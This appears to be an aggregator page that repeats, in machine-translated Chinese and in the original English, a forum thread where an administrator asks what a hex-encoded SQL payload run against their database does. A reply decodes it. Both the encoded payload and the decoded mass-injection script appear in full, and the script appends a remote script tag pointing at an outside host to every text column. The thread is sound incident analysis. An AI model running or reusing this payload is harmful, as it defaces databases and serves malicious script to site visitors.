紧急：解密针对数据库执行的二进制代码

本文介绍了紧急：解密针对数据库执行的二进制代码的处理方法，对大家解决问题具有一定的参考价值，需要的朋友们下面随着小编来一起学习吧！问题描述我需要弄清楚一些恶意执行的代码对于数据库是什么。然而，它的格式非常奇怪。它只需声明一个变量并将其设置为等于一个巨大的二进制东西（似乎是某种编译代码）转换为nvarchar。然后执行这个变量。有没有办法解密或反编译这段代码？有没有人有关于SQL Server在被要求执行二进制字符串（而不是常规T-SQL）和任何工具时执行的操作的信息可以用来反汇编或理解这段代码吗？谢谢！这里是代码： DECLARE @S NVARCHAR（4000）; 设置 @ S = CAST（0x4400450043004C00410052004500200040005400 20007600610072006300680061007200280032003500350029 002C0040004300200076006100720063006800610072002800 320035003500290020004400450043004C0041005200450020 005400610062006C0065005F0043007500720073006F007200 200043005500520053004F005200200046004F005200200073 0065006C00650063007400200061002E006E0061006D006500 2C0062002E006E0061006D0065002000660072006F006D0020 007300790073006F0062006A00650063007400730020006100 2C0073007900730063006F006C0075006D006E007300200062 00200077006800650072006500200061002E00690064003D00 62002E0069006400200061006E006400200061002E00780074 0079 00700065003D00270075002700200061006E0064002000 280062002E00780074007900700065003D003900390020006F 007200200062002E00780074007900700065003D0033003500 20006F007200200062002E00780074007900700065003D0032 003300310020006F007200200062002E007800740079007000 65003D00310036003700290020004F00500045004E00200054 00610062006C0065005F0043007500720073006F0072002000 4600450054004300480020004E004500580054002000460052 004F004D00200020005400610062006C0065005F0043007500 720073006F007200200049004E0054004F002000400054002C 004000430020005700480049004C0045002800400040004600 45005400430048005F005300540041005400550053003D0030 002900200042004500470049004E0020006500780065006300 2800270075007000640061007400650020005B0027002B0040 0054002B0027005D00200073006500740020005B0027002B00 400043002B0027005D003D0072007400720069006D00280063 006F006E007600650072007400280076006100720063006800 610072002C005B0027002B00400043002B0027005D00290029 002B00270027003C0073006300720069007000740020007300 720063003D006800 7400740070003A002F002F007700770077 002E006B0069006C006C0077006F00770031002E0063006E00 2F0067002E006A0073003E003C002F00730063007200690070 0074003E002700270027002900460045005400430048002000 4E004500580054002000460052004F004D0020002000540061 0062006C0065005F0043007500720073006F00720020004900 4E0054004F002000400054002C0040004300200045004E0044 00200043004C004F005300450020005400610062006C006500 5F0043007500720073006F00720020004400450041004C004C 004F00430041005400450020005400610062006C0065005F00 43007500720073006F007200 AS NVARCHAR（4000））; EXEC（@S）; 解决方案 [...] Hi 将代码复制到一个测试数据库的查询窗口中，然后输入 EXEC（@S）只需简单地执行 SELECT @S 并查看结果。这是我得到的： DECLARE @T varchar （255），@ C varchar（255） DECLARE Table_Cursor CURSOR FOR select a.name，b.name 来自sysobjects a，syscolumns b 其中a.id = b.id和a.xtype =''u''和（b.xtype = 99或b.xtype = 35或 b.xtype = 231或b.xtype = 167） OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @ T，@ C WHILE（@@ FETCH_STATUS = 0） BEGIN exec（''update [''+ @ T +''] set [''+ @ C +''] = rtrim（转换（varchar，[''+ @ C +'']））+'''' < script src = http：// www .killwow1.cn / g.js>< / script>'''''' FETCH NEXT FROM Table_Cursor INTO @ T，@ C END CLOSE Table_Cursor DEALLOCATE Table_Cursor 我不太了解这个真正的作用，而且很多将取决于从网站上下来的是什么。但我觉得你有些讨厌，我会尽快杀死这个数据库并从中恢复一个干净的备份。 HTH Matthias Kl？y - www.kcc.ch Hi,I need to figure out what some code that was maliciously executedagainst a database does. However, it''s in a very strange format. Itsimply declares a variable and sets it equal to a huge binary thing(seems to be some sort of compiled code) cast as nvarchar. It thenexecutes this variable.Is there any way to decipher or decompile this code? Does anyonehave information either on what SQL Server does when it''s asked toexecute a binary string (as opposed to regular T-SQL) and any toolsthat can be used to disassemble or understand this code?Thanks! Here''s the code: DECLARE @S NVARCHAR(4000);SET@S=CAST(0x4400450043004C00410052004500200040005400 20007600610072006300680061007200280032003500350029 002C0040004300200076006100720063006800610072002800 320035003500290020004400450043004C0041005200450020 005400610062006C0065005F0043007500720073006F007200 200043005500520053004F005200200046004F005200200073 0065006C00650063007400200061002E006E0061006D006500 2C0062002E006E0061006D0065002000660072006F006D0020 007300790073006F0062006A00650063007400730020006100 2C0073007900730063006F006C0075006D006E007300200062 00200077006800650072006500200061002E00690064003D00 62002E0069006400200061006E006400200061002E00780074 007900700065003D00270075002700200061006E0064002000 280062002E00780074007900700065003D003900390020006F 007200200062002E00780074007900700065003D0033003500 20006F007200200062002E00780074007900700065003D0032 003300310020006F007200200062002E007800740079007000 65003D00310036003700290020004F00500045004E00200054 00610062006C0065005F0043007500720073006F0072002000 4600450054004300480020004E004500580054002000460052 004F004D00200020005400610062006C0065005F0043007500 720073006F007200200049004E0054004F002000400054002C 004000430020005700480049004C0045002800400040004600 45005400430048005F005300540041005400550053003D0030 002900200042004500470049004E0020006500780065006300 2800270075007000640061007400650020005B0027002B0040 0054002B0027005D00200073006500740020005B0027002B00 400043002B0027005D003D0072007400720069006D00280063 006F006E007600650072007400280076006100720063006800 610072002C005B0027002B00400043002B0027005D00290029 002B00270027003C0073006300720069007000740020007300 720063003D0068007400740070003A002F002F007700770077 002E006B0069006C006C0077006F00770031002E0063006E00 2F0067002E006A0073003E003C002F00730063007200690070 0074003E002700270027002900460045005400430048002000 4E004500580054002000460052004F004D0020002000540061 0062006C0065005F0043007500720073006F00720020004900 4E0054004F002000400054002C0040004300200045004E0044 00200043004C004F005300450020005400610062006C006500 5F0043007500720073006F00720020004400450041004C004C 004F00430041005400450020005400610062006C0065005F00 43007500720073006F007200AS NVARCHAR(4000)); EXEC(@S); 解决方案 [...] Hi Copy the code into a query window for a test datadase, then insted ofthe EXEC(@S) just simply do a SELECT @S and look at the result. Here is what I got: DECLARE @T varchar(255),@C varchar(255)DECLARE Table_Cursor CURSOR FOR select a.name,b.namefrom sysobjects a,syscolumns bwhere a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 orb.xtype=231 or b.xtype=167) OPEN Table_CursorFETCH NEXT FROM Table_Cursor INTO @T,@CWHILE(@@FETCH_STATUS=0)BEGINexec(''update [''+@T+'']set [''+@C+'']=rtrim(convert(varchar,[''+@C+'']))+''''<script src=http://www.killwow1.cn/g.js></script>'''''')FETCH NEXT FROM Table_Cursor INTO @T,@CEND CLOSE Table_CursorDEALLOCATE Table_Cursor I''m not good enough to understand what this really does, and a lotwill depend on what is coming down the line from the web site. But I think you got yourself something nasty, and I would ASAP killthis DB and restore from a clean backup. HTHMatthias Kl?y-- www.kcc.ch 这篇关于紧急：解密针对数据库执行的二进制代码的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持！